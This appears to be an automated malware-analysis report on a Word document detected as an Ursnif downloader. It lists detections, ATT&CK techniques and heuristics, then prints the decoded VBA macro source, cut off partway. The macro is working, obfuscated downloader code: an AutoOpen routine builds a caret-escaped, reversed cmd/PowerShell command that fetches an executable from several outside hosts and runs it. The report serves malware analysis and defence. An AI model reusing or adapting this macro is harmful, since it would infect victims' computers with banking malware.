MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.URSNIF-6729855-3. It contains a VBA macro with an AutoOpen subroutine that utilizes the Shell() function. This function is likely used to execute a command that downloads and runs a secondary payload, a common technique for malware droppers. The macro's obfuscated string concatenation suggests an attempt to hide the actual command being executed.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELL — Shell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPEN — AutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC — OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it is not a downloader or parser-CVE attribution.
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5508 bytes |
| SHA-256: fde7c1c4506a29147546f1c5238ca313a6ac36f9ca749f41883f8da518d4a3b3 | | | |
Preview script — First 1,000 lines of the extracted script
Attribute VB_Name = "aDrJnizn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "qBtYd" + "NkaGQmH"
Hour "O" + "YMwnJEXBBsU" + "3632" + "FRHK"
VBA.Shell CleanString(m) + mvNwWodN + GKkisiK + wifnsAfH + iDQhwXN + QXJizaPN + AiZaZiQkOkSASV + aDsiEuQqJd, 34 - 34
Hour "aXK" + "7012" + "P" + "2107"
Hour "NUo" + "FD" + "cNC" + "pmGSaRi"
Hour "6581" + "mtdrGr"
Hour "532441974" + "S"
Hour "3051" + "125150513" + "vO" + "wUHa"
End Sub
Attribute VB_Name = "AfncHpakfb"
Function wifnsAfH()
On _
Error _
Resume _
Next
Hour "3109" + "ijdCMEHOvVrdO" + "IkBFoFoY" + "61107832"
Hour "fNnWlYfd" + "cRkQ"
Hour "229346390" + "388026885"
Hour "RPAzuGfN" + "182793583"
Hour "zw" + "RXGJDolzDJT"
jrpwfCa = "cm" + "d /V^:" + "^ON/C" + Chr(1 + 3 + 3 + 4 + 23) + "^" + "s^et ^" + "l^t" + "n=^ " + " " + " ^"
Hour "nK" + "wfTP"
Hour "5601" + "Y"
EjzzT = " ^" + " ^ " + " ^ ^ }" + "^}^{" + "^hct" + "ac^}" + "^;" + "ka"
Hour "1053" + "177923006" + "wKpvIuvzU" + "437827964"
Hour "373578485" + "VJLmnd" + "fNCSRC" + "ulzR"
Hour "wl" + "2171"
ZlIjTDcm = "^erb" + "^;" + "^A^z" + "^" + "H"
Hour "TYfv" + "423644178"
Hour "bsq" + "sCakK"
Hour "So" + "wuiuEBNSjC"
Hour "8956" + "336244354"
VqWkbmdJdi = "$ me^t^" + "I^" + "-" + "ek^ovn" + "^" + "I^;" + ")^A^z" + "^H$ " + ",WRv^$" + "(^el" + "^i^" + "Fd" + "a^"
Hour "7764" + "Blf"
Hour "VK" + "dEXmIstXhiBc"
Ariwnsh = "o" + "^ln^w" + "^o^D^." + "HjM$^{" + "^yrt{)^" + "p" + "m" + "^" + "U" + "$ n^i^" + " ^"
Hour "292822983" + "4289"
Hour "TqFs" + "321947025"
ulHCXmVtF = "WRv$(" + "^hcaer^" + "o^" + "f^;^'" + "^" + "e^xe" + "^.^'^+" + "X" + "iS$+'"
wifnsAfH = jrpwfCa + EjzzT + ZlIjTDcm + VqWkbmdJdi + Ariwnsh + ulHCXmVtF
Hour "Oo" + "239607807"
Hour "Q" + "bdhLownSq" + "9603" + "328933618"
Hour "NOJEqW" + "QRm"
Hour "jMd" + "66"
End Function
Function iDQhwXN()
On _
Error _
Resume _
Next
Hour "74940547" + "wqq" + "qFE" + "RZ"
Hour "118865102" + "4126"
Hour "IsuT" + "W" + "49353529" + "uJ"
Hour "OkLb" + "UZX" + "1725" + "fP"
Hour "dFvLrzR" + "bEsLqEPQtC"
Hour "6127" + "PLTt" + "UF" + "GWZWlzRzApDYW"
qzpfcYfwDc = "^\^" + "'+c" + "i^l^" + "bu^p:vn" + "e" + "^$" + "=" + "^Az^H^$" + ";^'^36" + "7^' =^" + " XiS$;" + ")'@^"
Hour "1938" + "7292"
Hour "F" + "nHpc" + "3173" + "3588"
Hour "29886437" + "IWmWWE" + "7174" + "X"
czUjFW = "'(" + "t^i" + "^lp" + "^S.'" + "rx^" + "iQyXY"
Hour "EI" + "szajwArWUQcpjH"
Hour "7238" + "IRj" + "102550016" + "2523"
UkzawwQf = "/m" + "^oc." + "u" + "l^g^osi" + "r^a^fs" + "ir^a"
Hour "21615936" + "2648"
qElSXvN = "f//^:^" + "p" + "^t" + "^t" + "^" + "h@b" + "z^" + "9xL^i^" + "Q^e" + "4/^mo" + "c^.^tn^" + "emanru"
Hour "453197111" + "9392" + "CSTHwLiTC" + "1390"
pYGJF = "ot" + "^lla^br" + "egn^e" + "^ll^a^" + "hc//^:^" + "p" + "^t^" + "th^" + "@^J^5mn" + "G8^MU" + "/nc" + "^.e^"
Hour "529741019" + "hIdidlCVuhUw" + "6702" + "EJzYtvn"
Hour "ifjjaIiI" + "1313"
Hour "506" + "Euh" + "4836" + "406231646"
kWwCNfEi = "s^ac^u" + "i" + "n//:^p" + "t^t^h^@" + "^86x" + "^y^2c" + "nl/^" + "gro" + ".^a^l" + "^" + "a" + "n-^awi^" + "j^.^orp"
Hour "1284" + "YJhLPhGw" + "7993" + "427508345"
Hour "nltsttWI" + "aHi"
Hour "lRCz" + "V" + "VUsC" + "vIMPNFiwCu"
iYkadRXOC = "^j//:pt" + "^th@L^l" + "0^Ou" + "g^PI" + "^"
Hour "9514" + "5387"
Hour "ohb" + "pvrF" + "130290933" + "LR"
RuafMq = "b/" + "t^i^." + "^omr" + "elap^" + ".^i" + "^sec" + "^o^i^di"
Hour "i" + "jjVQqidmo" + "Pc" + "7446"
Hour "7641" + "VtX"
MBHNUoqFNot = "cr^a" + "^.^e" + "^" + "p^p^e" + "^sui" + "^g^a" + "^i" + "r^a^mu"
Hour "241069210" + "263517539" + "N" + "8279"
Hour "4864" + "5192" + "5008" + "SHhcj"
Hour "nWfP" + "6112"
Hour "dhKzvAZENbWWt" + "502561866"
dEzdsh = "s^eg/" + "/:p" + "tth
... (truncated)
|
|||